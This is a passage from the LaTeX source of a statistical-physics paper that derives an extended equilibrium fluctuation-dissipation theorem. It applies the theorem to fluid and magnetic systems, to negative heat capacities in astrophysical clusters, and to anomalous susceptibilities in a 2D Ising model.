-\beta_{i}I^{i}\right) \Omega\left( I\right) dI.
\end{equation}
Let us denote by $\partial^{i}A\left( \beta\right) =\partial
A\left( \beta\right) /\partial\beta_{i}$ the first partial
derivatives of an arbitrary function $A\left( \beta\right) $
defined on the thermodynamic parameters $\beta$. It is easy to
verify the validity of the following identities:
\begin{equation}
\left\langle I^{i}\right\rangle =-\partial^{i}\log Z\left(
\beta\right) ,~\left\langle \delta I^{i}\delta I^{j}\right\rangle
=\partial^{i}\partial ^{j}\log Z\left( \beta\right) .
\end{equation}
The substitution of the first relation into the second one yields:%
\begin{equation}
\chi_{BG}^{ij}=C^{ij}=\left\langle \delta I^{i}\delta
I^{j}\right\rangle ,
\label{can.fr}%
\end{equation}
where the symmetric matrix $\chi_{BG}^{ij}$:
\begin{equation}
\chi_{BG}^{ij}=-\frac{\partial\left\langle I^{j}\right\rangle
}{\partial
\beta_{i}} \label{can.resp}%
\end{equation}
will be referred to as the \textit{canonical response matrix}. Since
the correlation matrix $C^{ij}=\left\langle \delta I^{i}\delta
I^{j}\right\rangle
$ is a positive definite matrix, the canonical response matrix $\chi_{BG}%
^{ij}$ is also a positive definite matrix.
The identity (\ref{can.fr}) is a rigorous result within the
Boltzmann-Gibbs distributions (\ref{bg.w}). Notice that an analogous
expression can be derived within the Gaussian approximation from the
fluctuation relation (\ref{FGA}) after imposing the restriction
$\delta\beta_{i}^{\omega}=0$, that is, Eq.(\ref{basic}), which can
be rephrased as:
\begin{equation}
\chi_{s}^{ij}=\left\langle \delta I^{i}\delta I^{j}\right\rangle ,
\label{mic.fr}%
\end{equation}
with $\chi_{s}^{ij}$ being the inverse matrix of the entropy Hessian
with opposite sign evaluated at the most likely macrostate:
\begin{equation}
\chi_{s}^{ij}=-H^{ij}\left( \bar{I}\right) . \label{mic.resp}%
\end{equation}
Comparison between Eqs.(\ref{can.fr}) and (\ref{mic.fr}) leads to
establish the relationship $\chi_{BG}^{ij}\sim\chi_{s}^{ij}$, which
allows to refer to $\chi_{s}^{ij}$ as the \textit{microcanonical
response matrix} of the system.
The microcanonical response matrix $\chi_{s}^{ij}$ defined above is
a \textit{purely microcanonical quantity}, that is, it is an
intrinsic thermodynamic quantity that can be attributed to an
isolated system. Actually, the physical meaning of such a response
matrix is \textit{unclear}. In general, a response function
characterizes the\textit{\ sensibility of the system under the
external control}, and consequently, such a concept is only relevant
for an open system. While such a physical relevance is satisfied by
the canonical response matrix $\chi_{BG}^{ij}$, its applicability is
only restricted to the case when the thermodynamic influence of the
environment corresponds to the Boltzmann-Gibbs distributions
(\ref{bg.w}), where the thermodynamic parameters $\left\{
\beta_{i}\right\} $ are constant parameters instead of
\textit{fluctuating quantities}.
According to these last reasonings, the concept of response matrix
$\chi^{ij}$\ should be extended in order to be also applicable in a
more general system-environment equilibrium situation. Since the
physical observables $I$\ and the (control) thermodynamic variables
$\beta^{\omega}$ undergoing, in general, thermal fluctuations, a
simple operational definition for the concept of response matrix
$\chi^{ij}_{\omega}$ could be introduced in terms of expectation
values as follows:
\begin{equation}
\chi^{ij}_{\omega}=-\frac{\partial\left\langle I^{j}\right\rangle
}{\partial \left\langle \beta_{i}^{\omega}\right\rangle
}\equiv-\frac{\partial
\left\langle I^{j}\right\rangle }{\partial\left\langle \beta_{i}%
^{s}\right\rangle }. \label{operational.def}%
\end{equation}
Here, we have took into account the equilibrium conditions
$\left\langle \beta_{i}^{\omega}\right\rangle =\left\langle
\beta_{i}^{s}\right\rangle $.
Clearly, definition (\ref{operational.def}) contains the canonical
response matrix $\chi_{BG}^{ij}$ as a particular case when
$\delta\beta_{i}^{\omega
}=0\Rightarrow\beta_{i}^{\omega}=\beta_{i}\sim const$. The response
matrix $\chi^{ij}_{\omega}$ defined in this way is more realistic
and general than the one associated with the canonical response
matrix (\ref{can.resp}). The canonical response matrix
$\chi_{BG}^{ij}$ presupposes that the control parameters $\left\{
\beta_{i}\right\} $ have no fluctuations. Such an exigency is
clearly an idealization since \textit{any real measuring process
always involves a perturbation of the thermodynamic state of the
measuring apparatus}. For example, both the temperature indicated by
a thermometer and the pressure indicated by a barometer are affected
by the thermodynamic influence of the system under study. In
practice, the true values of temperature $T$ and pressure $p$
employed to calculate the heat capacity $C_{p}$ at constant pressure
and the isothermal compressibility $K_{T}$ of a given system are
actually \textit{expectation values}, $\left\langle T\right\rangle $
and $\left\langle p\right\rangle $. Therefore, the practical
operational definition of these concepts reads as follows:
\begin{equation}
C_{p}=\left\langle T\right\rangle \left( \frac{\partial\left\langle
S\right\rangle }{\partial\left\langle T\right\rangle }\right)
_{\left\langle p\right\rangle },~K_{T}=-\frac{1}{\left\langle
V\right\rangle }\left( \frac{\partial\left\langle V\right\rangle
}{\partial\left\langle p\right\rangle }\right) _{\left\langle
T\right\rangle },
\end{equation}
where we have taken into consideration the stochastic character of
the energy $U$, the volume $V$ and the entropy $S=S\left( U,V\right)
$.
As already discussed, the expectation values $\left\langle
I^{i}\right\rangle $ and $\left\langle \beta_{i}^{s}\right\rangle $
are given within the Gaussian approximation by the corresponding
values at the most likely macrostate $\bar{I}$, $\left\langle
I^{i}\right\rangle =\bar{I}^{i}$ and $\left\langle
\beta_{i}^{s}\right\rangle =\bar{\beta}_{i}^{s}=\beta_{i}^{s}\left(
\bar
{I}\right) $, which allows to rewrite Eq.(\ref{operational.def}) as follows:%
\begin{equation}
\chi^{ij}_{\omega}=-\frac{\partial\bar{I}^{j}}{\partial\bar{\beta}_{i}^{s}}=\chi
_{s}^{ij}\left( \bar{I}\right) . \label{identification}%
\end{equation}
\textbf{Claim 4:} \textit{The response matrix
}$\chi^{ij}_{\omega}$\textit{ of
Eq.}(\ref{operational.def})\textit{\ could be identified with the
microcanonical response matrix }$\chi_{s}^{ij}$ (\ref{mic.resp}%
)\textit{ at the most likely macrostate }$\bar{I}$\textit{ as long
as the Gaussian approximation applied}.
Equilibrium fluctuation relation (\ref{mic.fr}) is inapplicable
within the anomalous region $\mathcal{A}^{BG}$ of the
Boltzmann-Gibbs distributions because of the microcanonical response
matrix $\chi_{s}^{ij}$ turns a non positive defined matrix.
\textbf{Claim 5:} \textit{The unstable region of the Boltzmann-Gibbs
distributions} $\mathcal{A}^{BG}$ \textit{corresponds to macrostates
with anomalous values in the response functions, such as macrostates
with negative heat capacities at constant magnetic $C_{p}<0$ or
negative isothermal compressibilities $K_{T}<0$ in a fluid system,
or macrostates with negative heat capacities at constant magnetic
field $C_{H}<0$ or isothermal magnetic susceptibilities $\chi_{T}<0$
in a paramagnetic system.}
As already shown, the presence of macrostates with anomalous values
of response functions is incompatible with the imposition of the
restriction $\delta\beta_{i}^{\omega}=0$ into the fluctuation
relation (\ref{FGA}). However, this same fluctuation relation can be
rewritten to obtain an extension of Eq.(\ref{mic.fr}), which is
expressed here in the following:
\textbf{Theorem:} \textit{The system fluctuating behavior
$C^{ij}=\left\langle \delta I^{k}\delta I^{j}\right\rangle$ is
determined within the Gaussian approximation by its response
$\chi_{\omega}^{ij}=-\partial\left\langle
I^{j}\right\rangle/\partial\left\langle
\beta^{\omega}_{i}\right\rangle$
and the incidence of correlative effects $M^{j}_{i}=\left\langle \delta\beta_{k}^{\omega}\delta I^{j}%
\right\rangle$ that appear as a consequence of the external
influence of the environment through the following fluctuation
relations:}
\begin{equation}
\chi_{\omega}^{ij}=C^{ij}+\chi_{\omega}^{ik}M_{k}^{j}. \label{gfdr}%
\end{equation}
Eq.(\ref{gfdr}) constitutes the central result of this work. Since
the fluctuation relation (\ref{can.fr}) is simply the equilibrium
version of the so-called \textit{fluctuation-dissipation theorem},
the expression (\ref{gfdr}) can be unambiguously referred to as the
\textit{extended equilibrium fluctuation-dissipation theorem}. The
same one accounts for the system fluctuating behavior beyond the
equilibrium thermodynamic conditions associated with the
Boltzmann-Gibbs distributions (\ref{BGD}) in a way that it is
compatible with the existence of anomalous response functions. As
already discussed, its validity relies on the applicability of the
Gaussian approximation, which arises as a licit treatment in the
limit of large system size $N$. As expected, the present theorem
comprises all those preliminary conclusions obtained along this
work, with the exception of claim 1, which was obtained from a more
general equilibrium fluctuation relation, Eq.(\ref{fundamental}).
Let us finally obtain the form of the extended equilibrium
fluctuation-dissipation theorem (\ref{gfdr}) in terms of the
ordinary thermodynamic variables and potentials of statistical
mechanics and thermodynamics: $\left( U,\beta\right) $ and $\left(
X,Y\right) $ and the Enthalpy $G=U+YX$. The known relations:%
\begin{equation}%
\begin{array}
[c]{c}%
-\partial_{\beta}\log Z\left( \beta,Y\right) =\left\langle
G\right\rangle ,~\beta\left\langle X\right\rangle =-\partial_{Y}\log
Z\left( \beta,Y\right)
\\
\partial_{\beta}^{2}\log Z\left( \beta,Y\right) =\left\langle \delta
Q^{2}\right\rangle ,~\partial_{Y}^{2}\log Z\left( \beta,Y\right)
=\beta
^{2}\left\langle \delta X^{2}\right\rangle ,\\
\partial_{\beta}\partial_{Y}\log Z\left( \beta,Y\right) =\beta\left\langle
\delta Q\delta X\right\rangle ,
\end{array}
\end{equation}
allow to re-express Eq.(\ref{can.fr}) in a compact matrix form as
follows:
\begin{equation}
\mathcal{R}=\mathcal{F},\label{can1}%
\end{equation}
where the response and the correlation matrixes $\mathcal{R}$ and
$\mathcal{F}$ are given by:
\begin{equation}%
\begin{array}
[c]{c}%
\mathcal{R}=-\left(
\begin{array}
[c]{cc}%
\partial_{\beta}\left\langle G\right\rangle & \partial_{\beta}\left(
\beta\left\langle X\right\rangle \right) \\
\partial_{Y}\left\langle G\right\rangle & \beta\partial_{Y}\left\langle
X\right\rangle
\end{array}
\right) ,\\
\mathcal{F}=\left(
\begin{array}
[c]{cc}%
\left\langle \delta Q^{2}\right\rangle & \beta\left\langle \delta
Q\delta
X\right\rangle \\
\beta\left\langle \delta X\delta Q\right\rangle &
\beta^{2}\left\langle \delta X^{2}\right\rangle
\end{array}
\right) .
\end{array}
\label{asso.FR}%
\end{equation}
It is important to keep in mind that the Enthalpy fluctuation
$\delta G$ within the Boltzmann-Gibbs distribution (\ref{BGD}) is
amount of heat $\delta Q$\ exchanged between the system and its
environment at the equilibrium, $\delta G=\delta U+Y\delta X=\delta
Q$. Such a relationship does not hold in general, since $\delta
G=\delta Q+X\delta Y$ when the fluctuations $\delta Y$ are taken
into consideration. The matrix form of the fluctuation-dissipation
relations (\ref{can.fr}) in terms of the conjugated thermodynamic
variables $\left( U,\beta\right) $ and $\left( X;\xi\right) $
with $\xi=\beta Y$
reads as follows:%
\begin{equation}
\chi=C,\label{can2}%
\end{equation}
where the response and the correlation matrixes $\chi$ and $C$ are given by:%
\begin{eqnarray}
\chi=-\left(
\begin{array}
[c]{cc}%
\partial_{\beta}\left\langle U\right\rangle & \partial_{\beta}\left\langle
X\right\rangle \\
\partial_{\xi}\left\langle U\right\rangle & \partial_{\xi}\left\langle
X\right\rangle
\end{array}
\right) , \\
C=\left(
\begin{array}
[c]{cc}%
\left\langle \delta U^{2}\right\rangle & \left\langle \delta
U\delta
X\right\rangle \\
\left\langle \delta X\delta U\right\rangle & \left\langle \delta
X^{2}\right\rangle
\end{array}
\right).
\end{eqnarray}
One can verify the existence of the following transformation rules
between these two representations:
\begin{equation}
\mathcal{F}=\mathcal{T}C\mathcal{T}^{T},~\mathcal{R}=\mathcal{T}%
\chi\mathcal{T}^{T},
\end{equation}
where the transformation matrix $\mathcal{T}$ is given by:%
\begin{equation}
\mathcal{T}=\left(
\begin{array}
[c]{cc}%
1 & Y\\
0 & \beta
\end{array}
\right) .
\end{equation}
Finally, one can rewrite the compact matrix form of extended
equilibrium fluctuation-dissipation theorem (\ref{gfdr}) in these
equivalent representations as follows:
\begin{equation}
\chi=C+\chi M\Leftrightarrow\mathcal{R}=\mathcal{F}+\mathcal{RM}%
\label{gen.fdr}%
\end{equation}
where the correlation matrixes $M$ and $\mathcal{M}$ are given by:%
\begin{equation}%
\begin{array}
[c]{c}%
M=\left(
\begin{array}
[c]{cc}%
\left\langle \delta\beta^{\omega}\delta U\right\rangle &
\left\langle
\delta\beta^{\omega}\delta X\right\rangle \\
\left\langle \delta\xi^{\omega}\delta U\right\rangle & \left\langle
\delta \xi^{\omega}\delta X\right\rangle
\end{array}
\right) ,\\
\mathcal{M}=\left(
\begin{array}
[c]{cc}%
\left\langle \delta\beta^{\omega}\delta Q\right\rangle &
\beta\left\langle
\delta\beta^{\omega}\delta X\right\rangle \\
\left\langle \delta Y^{\omega}\delta Q\right\rangle &
\beta\left\langle \delta Y^{\omega}\delta X\right\rangle
\end{array}
\right) ,
\end{array}
\label{A2.FR}%
\end{equation}
which are related by the transformation rule:
\begin{equation}
\mathcal{M}=\left( \mathcal{T}^{T}\right) ^{-1}M\mathcal{T}^{T}.
\end{equation}
As expected, the quantities $\left( \beta^{\omega},Y^{\omega}\right)
$ denote the thermodynamic parameters of the environment.
\section{Examples of application}
\subsection{Application to fluid and
magnetic systems}
Direct application of Eqs.(\ref{asso.FR}) and (\ref{A2.FR}) to the
thermodynamic variables of a fluid system with Enthalpy $G=U+pV$
leads to the following expressions of the matrixes $\mathcal{R}$,
$\mathcal{F}$ and $\mathcal{M}$:
\begin{equation}%
\begin{array}
[c]{c}%
\mathcal{R}=\left(
\begin{array}
[c]{cc}%
T^{2}C_{p} & V\left( T\alpha_{p}-1\right) \\
-\left( \partial G/\partial p\right) _{T} & \beta VK_{T}%
\end{array}
\right) ,\\
\mathcal{F}=\left(
\begin{array}
[c]{cc}%
\left\langle \delta Q^{2}\right\rangle & \beta\left\langle \delta
Q\delta
V\right\rangle \\
\beta\left\langle \delta V\delta Q\right\rangle &
\beta^{2}\left\langle \delta V^{2}\right\rangle
\end{array}
\right) ,\\
\mathcal{M}=\left(
\begin{array}
[c]{cc}%
\left\langle \delta\beta^{\omega}\delta Q\right\rangle &
\beta\left\langle
\delta\beta^{\omega}\delta V\right\rangle \\
\left\langle \delta p^{\omega}\delta Q\right\rangle &
\beta\left\langle \delta p^{\omega}\delta V\right\rangle
\end{array}
\right) ,
\end{array}
\label{fluid}%
\end{equation}
where $C_{p}=\left( \partial G/\partial T\right) _{p}$ and $\alpha
_{p}=V^{-1}\left( \partial V/\partial T\right) _{p}$ are the heat
capacity
and the thermal expansibility at constant pressure, while $K_{T}%
=-V^{-1}\left( \partial V/\partial p\right) _{T}$ is the
isothermal compressibility. The symmetry of the response matrix in
Eq.(\ref{fluid}) leads
to the thermodynamical identity:%
\begin{equation}
\left( \frac{\partial G}{\partial p}\right) _{T}=V-T\left(
\frac{\partial V}{\partial T}\right) _{p}.
\end{equation}
The corresponding expressions for a magnetic system with Enthalpy
$G=U-HM$ are directly derived from the previous results by
substituting $\left( V,p\right) \rightarrow\left( M,-H\right) $:%
\begin{equation}%
\begin{array}
[c]{c}%
\mathcal{R}=\left(
\begin{array}
[c]{cc}%
T^{2}C_{H} & T\left( \partial M/\partial T\right) _{H}-M\\
\left( \partial G/\partial H\right) _{T} & \beta\chi_{T}%
\end{array}
\right) ,\\
\mathcal{F}=\left(
\begin{array}
[c]{cc}%
\left\langle \delta Q^{2}\right\rangle & \beta\left\langle \delta
Q\delta
M\right\rangle \\
\beta\left\langle \delta M\delta Q\right\rangle &
\beta^{2}\left\langle \delta M^{2}\right\rangle
\end{array}
\right) ,\\
\mathcal{M}=\left(
\begin{array}
[c]{cc}%
\left\langle \delta\beta^{\omega}\delta Q\right\rangle &
\beta\left\langle
\delta\beta^{\omega}\delta M\right\rangle \\
-\left\langle \delta H^{\omega}\delta Q\right\rangle &
-\beta\left\langle \delta H^{\omega}\delta M\right\rangle
\end{array}
\right) ,
\end{array}
\label{magnetic}%
\end{equation}
where $C_{H}=\left( \partial G/\partial T\right) _{H}$ is the heat
capacity at constant magnetic field and $\chi_{T}=\left( \partial
M/\partial H\right) _{T}$ the isothermal magnetic susceptibility.
The symmetry of the response
matrix in Eq.(\ref{magnetic}) leads to the thermodynamical identity:%
\begin{equation}
\left( \frac{\partial G}{\partial H}\right) _{T}=T\left(
\frac{\partial M}{\partial T}\right) _{H}-M.
\end{equation}
\subsection{Thermodynamic stability of macrostates with anomalous response functions}
A direct consequence of extended equilibrium fluctuation-dissipation
theorem (\ref{gen.fdr}) are the \textit{conditions of thermodynamic
stability}, which can be compatible in this framework with the
existence of anomalous response functions. In the present
subsection, let us discuss two simple application examples involving
macrostates with negative heat capacities and a numerical testing
during the study of macrostates with anomalous values in the
isothermal susceptibility of a paramagnetic system.
\subsubsection{Thirring's constraint:}
Let us first consider an equilibrium situation involving only the
conjugated thermodynamic pair energy-temperature. Since $\delta
X=0\Rightarrow\delta Q \equiv \delta U$, Eq.(\ref{gen.fdr}) drops to
the generalized equilibrium fluctuation-dissipation relation
involving the heat capacity (\ref{unc}) already obtained in our
previous work \cite{vel-unc}. A simple way to implement the
existence of non-vanishing correlated fluctuations $\left\langle
\delta \beta^{\omega}\delta U\right\rangle$ is by considering a
thermal contact with a bath (B) having a finite heat capacity
$C_{B}>0$. Clearly, the bath experiences a temperature fluctuation
$\delta T_{B}$ when the system absorbs or releases an amount of
energy $\delta U$, $\delta T_{B}=-\delta U/C_{B}\Rightarrow
\left\langle \delta \beta_{B}\delta U\right\rangle\neq 0$.
Eq.(\ref{unc}) can be rephrased as follows:
\begin{equation}
\frac{CC_{B}}{C+C_{B}}=\beta^{2}\left\langle \delta
U^{2}\right\rangle
\end{equation}
after considering the Gaussian approximation
$\delta\beta_{B}=\beta^{2}\delta U/C_{B}$ (here $k_{B}\equiv1$).
Since the expectation value of the square dispersion of the energy
fluctuations $\left\langle \delta U^{2}\right\rangle$ is
nonnegative, the thermodynamic stability of macrostates with
negative heat capacities $C<0$ demands the applicability of the
following condition:
\begin{equation}\label{Thirring.eq}
\frac{CC_{B}}{C+C_{B}}>0\Rightarrow 0<C_{B}<|C|.
\end{equation}
This result is same constraint derived by Thirring in the past
\cite{thir}. As already commented, the existence of anomalous
macrostates with negative heat capacities is a distinguish feature
of many nonextensive systems. However, since the derivation of
Thirring's constraint (\ref{Thirring.eq}) demands the existence of a
thermal contact, such a stability condition could be only applicable
to short-range interacting systems whose sizes are large enough in
order to dismiss the surface energy involved in their thermodynamic
interaction.
\subsubsection{Stability condition in an astrophysical
situation:}\label{astro.example} Let us now consider a paradigmatic
situation with long-range interactions: the astrophysical system
composed by a globular cluster (C) and its nearby galaxy (G). Let us
denote by $C_{C}$ and $C_{G}$ their respective heat capacities,
being $|C_{C}|\ll|C_{G}|$. At first glance, the galaxy could be
taken as a bath with a very large heat capacity, which naively
suggests that the thermo-statistical description of the globular
cluster could be performed with the help of the Gibbs' canonical
ensemble (\ref{can}). In this context, however, the known exigence
of a \textit{thermal contact} fails as a consequence of the
long-range nature of Gravitation.
Astronomers known since the late 1800s that the attractive character
and power-law $1/r^{2}$ dependence of gravitational interaction
favor a concentration of stars towards the inner regions of any
astrophysical structure and the increasing of their kinetic energies
while a decreasing of the total energy \cite{Eddington}, a tendency
stimulating the development of distribution profiles with a
\textit{core-halo structure} and negative heat capacities.
Consequently, it is a rule rather than an exception the fact that
the globular cluster and its nearby galaxy simultaneously exhibit
macrostates with negative heat capacities, $C_{C}<0$ and $C_{G}<0$.
Since Thirring's constraint (\ref{Thirring.eq}) cannot be satisfied,
and overall, the same one is inapplicable in the present situation,
the energy associated with the thermodynamic interaction between the
globular cluster and the galaxy should play a fundamental role in
the thermodynamic stability.
To obtain a general idea about how works the above mechanism, let us
denote by $W_{G-C}$ the energy contribution of the total energy
$U_{T}=U_{G}+U_{C}+W_{G-C}$ accounting for the potential energy
$V_{G-C}$ associated with the gravitational interaction between
these systems, as well as the kinetic energy contributions of the
collective translational motion $T_{G-C}$:
\begin{equation}
W_{G-C}=T_{G-C}+V_{G-C}.
\end{equation}
In general, $W_{G-C}$ should be significantly smaller than the
internal energy of the galaxy $U_{G}$, but it could be comparable to
the internal energy of the globular cluster $U_{C}$, $|W_{G-C}|\sim
|U_{C}|\ll |U_{G}|$. Strictly speaking, the total energy $U_{T}$
changes as a consequence of gravitational influence of other
neighboring astrophysical structures and the evaporation of stars.
However, the composed system globular cluster-galaxy can arrive at a
certain \textit{quasi-stationary evolution} under its own relaxation
mechanisms (collisions, violent relaxation, etc. \cite{inChava}) and
the incidence of stars evaporation, where $U_{T}$ changes at a very
slow rate, $\dot{U}_{T}\simeq 0$. In these conditions, it is
possible to speak about the existence of a certain
\textit{metastable thermodynamic equilibrium} between the globular
cluster and its nearby galaxy, a fact that it is manifested in the
observation of universal profiles such as the Vaucouleurs' law in
the surface brightness of the elliptical galaxies and the
Michie-King profiles for the distribution of stars in the globular
clusters \cite{Binney}.
Due to the coupling between collective and internal degrees of
freedom, the energy contribution $W_{G-C}$ will depends on the
internal states of the globular cluster and its nearby galaxy, so
that, it can be expressed by their respective internal energies
$(U_{G},U_{C})$ as well as some other collective variables $\sigma$
(their total masses, relative separation, etc.), $W_{G-C}\simeq
W(U_{G},U_{C};\sigma)$. Consequently, the cluster and galaxy
undergo, in general, a \textit{nonlinear energetic interchange}
during their thermodynamic interaction, $\Delta U_{G} \neq -\Delta
U_{C}$, since part of the energy transferred from the galaxy $\Delta
U_{G}$ towards the cluster is used to modify the interaction energy
$W_{G-C}$. Such a nonlinear interchange contracts with the usual
thermal contact between a Gibbs' bath (B) and an extensive system
(S), where $\Delta U_{B} = -\Delta U_{S}$.
As a consequence of the separability as well as the small number of
degrees of freedom of collective motions $N^{collective}_{G-C}$ in
comparison with the internal degrees of freedom of the galaxy
$N^{internal}_{G}$ and the globular cluster $N^{internal}_{G}$, the
distribution associated with the present situation can be
approximately given as the product of their respective densities of
states $\Omega_{G}$ and $\Omega_{C}$:
\begin{equation}
\rho(U_{C})\simeq A\Omega_{G}(U_{G})\Omega_{C}(U_{C}),
\end{equation}
where the internal energies $U_{G}$ and $U_{C}$ obey the constraint:
\begin{equation}
U_{T}=U_{G}+U_{C}+W_{G-C}\sim const,
\end{equation}
with $A$ being a normalization constant. Since the probabilistic
weight $\omega(U_{C})\sim\Omega_{G}(U_{G})$, the environment inverse
temperature (see definition in Eq.(\ref{eff.temp})) is given by:
\begin{equation}\label{eff.temp.astro}
\beta^{\omega}=-\left.\frac{\partial S_{G}(U_{G})}{\partial
U_{C}}\right|_{U_{T}}=\beta_{G}\alpha,
\end{equation}
where the subindex $U_{T}$ means that the partial derivation is
taken at constant total energy. In this last expression,
$\beta_{G}=\partial S_{G}(U_{G})/\partial U_{G}$ represents the
ordinary microcanonical inverse temperature of the galaxy and
$\alpha=\alpha(U_{C})$:
\begin{equation}
\alpha=-\left.\frac{\partial U_{G}}{\partial
U_{C}}\right|_{U_{T}}\equiv 1+\left.\frac{\partial W_{G-C}}{\partial
U_{C}}\right|_{U_{T}}=\alpha(U_{C}),
\end{equation}
a dimensionless factor that accounts for the underlying nonlinear
energetic interchange. Clearly, the inverse temperature
(\ref{eff.temp.astro}) is an \textit{effective concept} that
characterizes how the globular cluster \textit{fills} the
thermodynamic influence of the galaxy. Since in general $\alpha\neq
1$, the condition of thermal equilibrium $\beta^{\omega}=\beta_{C}$
implies that the microcanonical inverse temperatures of the galaxy
and the globular cluster are different, $\beta_{G}\neq\beta_{C}$.
Since the heat capacity of galaxy $C_{G}$ is extremely large in
comparison with the heat capacity of the globular cluster $C_{C}$,
the inverse temperature $\beta_{G}$ can be taken as a constant
parameter. Thus, we can limit to consider the thermal fluctuations
of effective inverse temperature $\beta^{\omega}$ associated with
the nonlinear energetic interchange:
\begin{equation}
\delta\beta^{\omega}\simeq\beta_{G}\alpha'(U_{C})\delta U_{C}.
\end{equation}
By substituting this last approximation into fluctuation-dissipation
relation of Eq.(\ref{unc}) and considering the condition of thermal
equilibrium $\beta^{\omega}=\beta_{C}$, one obtains:
\begin{equation}
\frac{C_{C}}{1+(\alpha\beta_{C})^{-1}C_{C}\alpha'}=\beta^{2}_{C}\left\langle\delta
U^{2}_{C}\right\rangle.
\end{equation}
Since $\left\langle\delta U^{2}_{C}\right\rangle>0$, one arrives at
the following condition of thermodynamic stability:
\begin{equation}\label{astro.cond}
\beta_{C}C^{-1}_{C}+\alpha^{-1}\alpha'>0.
\end{equation}
According to the present result, the globular cluster with $C_{C}<0$
can be found in a metastable thermodynamic with its nearby galaxy
provided that the underlying nonlinear energetic interchange
associated with the interaction energy $W_{G-C}$ ensured the
applicability of stability condition (\ref{astro.cond}).
\subsubsection{Anomalous response in paramagnetic
systems:}\label{2DIsing} Besides the long-range interacting systems
as the astrophysical example previously discussed, the existence of
macrostates with negative heat capacities is a relevant feature
indicating the occurrence of a \textit{discontinuous} (first-order)
\textit{phase transition} in a mesoscopic short-range interacting
system \cite{gro1}. The observation of anomalies in discontinuous
phase transitions is not restricted to the heat capacity, but other
response functions can also exhibit anomalous values too
\cite{Hugo}. In fact, their presence could be the origin of the
sudden change experienced by a given physical observable $X$ with a
small varying of its conjugated control parameter $Y$ below the
critical temperature $T_{c}$.
A typical example is found in a magnetic system between the
magnetization $M$ and the external magnetic field $H$. The sudden
inversion of magnetization $M\mapsto-M$ with $M\neq 0$, observed in
turns to the value $H=0$ below the critical temperature $T_{c}$, is
a consequence of the existence of unstable diamagnetic states
$\chi_{T}<0$. Such states are anomalous for magnetic materials
undergoing a paramagnetic-ferromagnetic phase transition, in those
equilibrium situations where the fluctuation-dissipation relation
$\chi_{T}=\beta\left\langle\delta M^{2}\right\rangle$ is supposed to
be relevant, and the inequality $\chi_{T}>0$ arises as the ordinary
stability condition.
Let us consider again a magnetic system with internal energy $U$ and
magnetization $M$. As already shown in this work, the corresponding
form of the generalized equilibrium fluctuation-dissipation
relations $\mathcal{R}=\mathcal{F}+\mathcal{RM}$ is specified by
matrixes of Eq.(\ref{magnetic}). In the sake of simplicity, let us
restrict to a particular equilibrium situation where temperature of
environment $\beta^{\omega}$ shows a constant value $\beta$, but the
external magnetic field $H^{\omega}$ acting on the magnetic system
undergoes non-vanishing thermal fluctuations $\left\langle\delta
H^{\omega}\delta M\right\rangle\neq 0$.
The simplest way to implement the above behavior is by admitting the
existence small thermodynamic fluctuation of the magnetic field
$H^{\omega}$ in turn to a constant value $H$ coupled to the total
magnetization of the system:
\begin{equation}\label{ans.mag}
H^{\omega}=H-\lambda\delta M/N,
\end{equation}
where $N$ is the system size and $\lambda$ a suitable coupling
constant. The general equilibrium fluctuation-dissipation relation
involving the isothermal magnetic susceptibility $\chi_{T}$ :
\begin{equation}
\beta\chi_{T} =\beta^{2}\left\langle \delta M^{2}\right\rangle
+\left( T\left( \partial M/\partial T\right) _{H}-M\right)
\beta\left\langle
\delta\beta^{\omega}\delta M\right\rangle \nonumber\\
-\beta^{2}\chi_{T}\left\langle \delta H^{\omega}\delta
M\right\rangle
\label{iso.sus}%
\end{equation}
drops to:
\begin{equation}
\beta\chi_{T}=\beta^{2}\left\langle \delta M^{2}\right\rangle -\beta^{2}%
\chi_{T}\left\langle \delta H^{\omega}\delta M\right\rangle
\end{equation}
in the present equilibrium situation, which can be rewritten as
follows:
\begin{equation}\label{iso.sus2}
\beta\left\langle \delta M^{2}\right\rangle
=\frac{\chi_{T}}{1+\lambda\chi _{T}/N}.
\end{equation}
Since the standard deviation of magnetization is nonnegative,
$\left\langle \delta M^{2}\right\rangle >0$, the anomalous
macrostates with negative values of isothermal magnetic
susceptibility $\chi_{T}<0$ are thermodynamically stable when the
condition:
\begin{equation}\label{mag.cond}
\lambda+N/\chi_{T}>0
\end{equation}
holds. Eq.(\ref{iso.sus2}) can also be used to obtain the dispersion
of the external magnetic field $H^{\omega}$:
\begin{equation}\label{iso.sus3}
\left\langle (\delta
H^{\omega})^{2}\right\rangle=\frac{1}{N^{2}}\lambda^{2}\left\langle
\delta
M^{2}\right\rangle=\frac{1}{N\beta}\lambda^{2}\frac{\chi_{T}/N}{1+\lambda\chi
_{T}/N}.
\end{equation}
Since $\chi_{T}$ grows with $N$ in general as $\chi_{T}\propto N$,
the dispersions of the magnetization and the external magnetic field
behave as $\left\langle \delta M^{2}\right\rangle\propto N$ and
$\left\langle (\delta H^{\omega})^{2}\right\rangle\propto 1/N$. When
the system size $N$ is large enough, the fluctuations of the
external magnetic field $H^{\omega}$ are very small. From the
viewpoint of thermodynamics (where thermal fluctuations are
dismissed due to the large size of conventional thermodynamic
systems), the present equilibrium does not differ from conventional
situations where the external magnetic field is assumed to be
constant. However, it is easy to see that both the fluctuating
behavior accounted for expressions (\ref{iso.sus2}) and
(\ref{iso.sus3}), as well as stability condition (\ref{mag.cond})
crucially depend on the external conditions which have been imposed
to, which are specified here by the coupling constant $\lambda$.
According to the stability condition (\ref{mag.cond}), macrostates
with negative isothermal susceptibilities can be found in a stable
equilibrium with an appropriate choosing of the coupling constant
$\lambda$. Even, fluctuation relation (\ref{iso.sus2}) could be also
used to obtain the isothermal magnetic susceptibility per particle
$\bar{\chi}_{T}=\chi_{T}/N$ in terms of fluctuating behavior of
magnetization:
\begin{equation}
\bar{\chi}_{T}^{-1}=\frac{1+\beta\left\langle \delta
H^{\omega}\delta M\right\rangle }{\beta\left\langle \delta
M^{2}\right\rangle }N\equiv
\frac{1-\lambda\beta\sigma_{m}^{2}}{\beta\sigma_{m}^{2}},
\end{equation}
where $\sigma_{m}^{2}=\left\langle \delta M^{2}\right\rangle /N$
represents the thermal dispersion of magnetization.
\begin{figure}
[t]
\begin{center}
\includegraphics[
height=4.7in, width=3.4in
]%
{anomalous.eps}%
\caption{Isotherms of 2D Ising model with $L=25$ derived from
Metropolis Monte Carlo simulations by using the acceptance
probability (\ref{as.met}): Panel a) magnetic field $\left\langle
H^{\omega}\right\rangle $ \textit{versus} magnetization
$\left\langle m\right\rangle $; Panel b) inverse isothermal magnetic
susceptibility $\bar{\chi}_{T}^{-1}$ \textit{versus} magnetization
$\left\langle m\right\rangle $. The labels in both panels indicate
the value
